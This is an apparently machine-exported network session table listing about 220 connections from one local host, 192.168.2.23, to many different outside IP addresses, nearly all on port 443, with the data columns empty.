                                            15020192.168.2.2357242158.20.44.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15021192.168.2.2342840167.41.37.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15022192.168.2.2343190144.148.94.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15023192.168.2.235373424.68.206.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15024192.168.2.233720678.88.14.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15025192.168.2.2355088174.79.86.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15026192.168.2.2360418130.226.108.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15027192.168.2.2341490149.253.196.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15028192.168.2.235838673.180.137.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15029192.168.2.233801871.50.20.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15030192.168.2.23588304.105.253.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15031192.168.2.2356688199.139.165.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15032192.168.2.2343178216.237.160.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15033192.168.2.2354504190.101.168.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15034192.168.2.233299451.89.246.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15035192.168.2.2355912200.26.89.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15036192.168.2.2345204175.161.58.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15037192.168.2.235146487.228.192.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15038192.168.2.2334958146.69.127.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15039192.168.2.233581219.35.180.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15040192.168.2.2343372205.34.145.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15041192.168.2.2356500211.214.6.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15042192.168.2.2355376119.219.32.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15043192.168.2.23584344.162.191.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15044192.168.2.2344582180.199.213.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15045192.168.2.2360708124.157.49.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15046192.168.2.2350922195.20.20.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15047192.168.2.2340220164.195.96.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15048192.168.2.2341410140.7.67.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15049192.168.2.235176448.115.98.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15050192.168.2.235996650.173.44.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15051192.168.2.233930668.199.129.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15052192.168.2.2337976207.152.63.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15053192.168.2.2342904197.95.31.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15054192.168.2.235529634.21.139.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15055192.168.2.2354392223.132.101.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15056192.168.2.2357314114.171.64.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15057192.168.2.234528843.161.140.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15058192.168.2.2355688206.148.45.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15059192.168.2.2342206183.94.130.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15060192.168.2.2342586161.134.169.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15061192.168.2.2356746208.103.106.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15062192.168.2.2336586219.91.53.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15063192.168.2.2351854159.121.224.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15064192.168.2.2338466156.48.220.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15065192.168.2.2343848188.149.117.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15066192.168.2.2342826217.195.220.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15067192.168.2.2334550162.27.126.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15068192.168.2.234925080.141.10.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15069192.168.2.234696068.145.74.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15070192.168.2.234224253.15.114.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15071192.168.2.2353900175.240.55.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15072192.168.2.234557068.88.39.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15073192.168.2.2355276131.108.51.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15074192.168.2.2354208160.211.105.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15075192.168.2.236075258.122.218.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15076192.168.2.234849417.184.125.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15077192.168.2.234159625.38.204.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15078192.168.2.233821831.65.196.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15079192.168.2.23365184.208.95.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15080192.168.2.233356465.193.39.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15081192.168.2.233992235.129.64.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15082192.168.2.23472524.154.138.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15083192.168.2.2334818164.22.73.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15084192.168.2.2360714181.87.38.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15085192.168.2.2357618136.171.222.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15086192.168.2.235318223.66.38.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15087192.168.2.2335700162.85.7.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15088192.168.2.2334150186.170.227.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15089192.168.2.233309425.221.123.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15090192.168.2.2348522143.43.186.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15091192.168.2.236005052.50.122.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15092192.168.2.2336212121.4.202.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15093192.168.2.2337212171.225.156.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15094192.168.2.234548614.167.147.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15095192.168.2.2354234131.132.217.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15096192.168.2.234241078.160.22.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15097192.168.2.233902288.96.33.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15098192.168.2.2349876111.39.172.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15099192.168.2.2336888118.122.103.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15100192.168.2.2356952168.76.216.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15101192.168.2.2336940146.189.221.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15102192.168.2.2358350151.169.157.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15103192.168.2.2360424174.66.153.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15104192.168.2.2355542111.247.107.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15105192.168.2.2341232174.166.214.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15106192.168.2.2334650117.211.247.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15107192.168.2.2341788186.26.86.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15108192.168.2.2360154103.56.179.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15109192.168.2.2346604135.148.169.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15110192.168.2.233290492.154.122.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15111192.168.2.2333180153.133.180.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15112192.168.2.2338080171.128.40.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15113192.168.2.2333968132.208.137.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15114192.168.2.2348524131.6.107.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15115192.168.2.235868894.132.200.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15116192.168.2.235358818.216.110.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15117192.168.2.2347874140.124.28.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15118192.168.2.233408461.135.36.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15119192.168.2.2354394212.220.227.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15120192.168.2.2360808185.225.93.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15121192.168.2.23563728.225.116.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15122192.168.2.234826260.147.102.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15123192.168.2.2347998179.148.52.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15124192.168.2.2334032123.198.166.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15125192.168.2.234887879.223.36.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15126192.168.2.2346156126.167.181.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15127192.168.2.234787431.204.34.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15128192.168.2.2340626131.44.181.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15129192.168.2.2356080162.210.221.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15130192.168.2.2343380130.68.159.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15131192.168.2.235602844.80.57.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15132192.168.2.2339096173.220.105.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15133192.168.2.2336398170.19.219.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15134192.168.2.233680283.189.223.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15135192.168.2.2343968186.59.87.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15136192.168.2.2344898179.89.248.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15137192.168.2.235727647.227.254.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15138192.168.2.2339692173.129.55.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15139192.168.2.2342540200.49.101.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15140192.168.2.234755019.153.233.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15141192.168.2.2340726183.62.22.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15142192.168.2.2344692212.49.27.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15143192.168.2.2354054140.6.70.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15144192.168.2.235352877.11.121.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15145192.168.2.2350638125.248.249.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15146192.168.2.2342774199.143.118.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15147192.168.2.2338148112.192.91.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15148192.168.2.2351390107.205.228.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15149192.168.2.2336064139.28.135.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15150192.168.2.2351274198.208.82.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15151192.168.2.2351884217.82.194.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15152192.168.2.233531285.212.109.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15153192.168.2.235499635.85.246.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15154192.168.2.234060060.127.130.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15155192.168.2.2333772123.89.44.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15156192.168.2.235904661.30.40.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15157192.168.2.235219481.49.93.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15158192.168.2.233504618.249.156.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15159192.168.2.233591852.127.6.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15160192.168.2.234601652.214.26.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15161192.168.2.2359794223.218.247.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15162192.168.2.235690048.60.39.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15163192.168.2.2358078148.100.175.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15164192.168.2.2337728121.142.35.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15165192.168.2.23559729.196.40.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15166192.168.2.2350610179.148.254.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15167192.168.2.2338920126.34.3.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15168192.168.2.2343622212.142.109.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15169192.168.2.2359232163.18.103.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15170192.168.2.2360144116.112.172.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15171192.168.2.233413689.99.246.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15172192.168.2.2357308133.4.82.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15173192.168.2.2339370198.21.113.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15174192.168.2.235718661.41.193.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15175192.168.2.235443218.87.159.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15176192.168.2.2335452120.84.99.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15177192.168.2.233791451.250.40.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15178192.168.2.2344148134.152.154.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15179192.168.2.234028242.114.205.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15180192.168.2.233587479.184.10.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15181192.168.2.233927857.247.108.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15182192.168.2.2348142222.163.167.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15183192.168.2.235156868.181.74.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15184192.168.2.2338880180.176.135.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15185192.168.2.233786240.212.189.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15186192.168.2.2356254208.56.218.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15187192.168.2.2338038107.159.155.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15188192.168.2.2344004153.138.108.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15189192.168.2.2355596198.193.204.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15190192.168.2.234985644.49.85.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15191192.168.2.2355448170.64.114.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15192192.168.2.2333044145.11.15.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15193192.168.2.2360824138.150.59.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15194192.168.2.2339970166.66.163.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15195192.168.2.235240624.50.1.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15196192.168.2.234835052.30.171.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15197192.168.2.2349232154.209.97.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15198192.168.2.2356248169.199.160.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15199192.168.2.2337860179.51.108.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15200192.168.2.2345590175.38.24.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15201192.168.2.2344334110.140.120.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15202192.168.2.23455328.135.196.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15203192.168.2.23536125.65.43.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15204192.168.2.2360022182.161.146.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15205192.168.2.235826644.46.101.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15206192.168.2.2355818155.20.219.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15207192.168.2.2358438177.126.199.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15208192.168.2.235145024.81.166.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15209192.168.2.2335134210.20.40.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15210192.168.2.234524432.108.31.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15211192.168.2.2343590122.49.130.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15212192.168.2.236064827.65.73.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15213192.168.2.23549669.49.15.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15214192.168.2.2346684122.130.217.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15215192.168.2.234557096.0.93.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15216192.168.2.235983076.117.55.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15217192.168.2.2355750133.88.35.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15218192.168.2.235378460.210.15.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15219192.168.2.2353876106.67.137.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15220192.168.2.2358654103.55.199.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15221192.168.2.233487617.96.25.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15222192.168.2.234738223.250.17.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15223192.168.2.233924647.173.98.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15224192.168.2.2359728223.200.42.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15225192.168.2.2344152109.101.54.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15226192.168.2.235156242.172.95.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15227192.168.2.2336324156.31.205.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15228192.168.2.235378291.16.98.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15229192.168.2.234923450.58.138.20037215
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15230192.168.2.23606145.214.34.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15231192.168.2.2356456208.69.42.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15232192.168.2.2347456123.76.13.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15233192.168.2.2345202121.152.105.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15234192.168.2.2349294172.160.79.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15235192.168.2.234633018.145.141.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15236192.168.2.2337194157.161.102.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15237192.168.2.2351816192.160.78.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15238192.168.2.235507490.243.27.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15239192.168.2.234923889.19.72.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15240192.168.2.2357118111.13.239.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15241192.168.2.2348186164.166.82.231443
                                            TimestampBytes transferredDirectionData


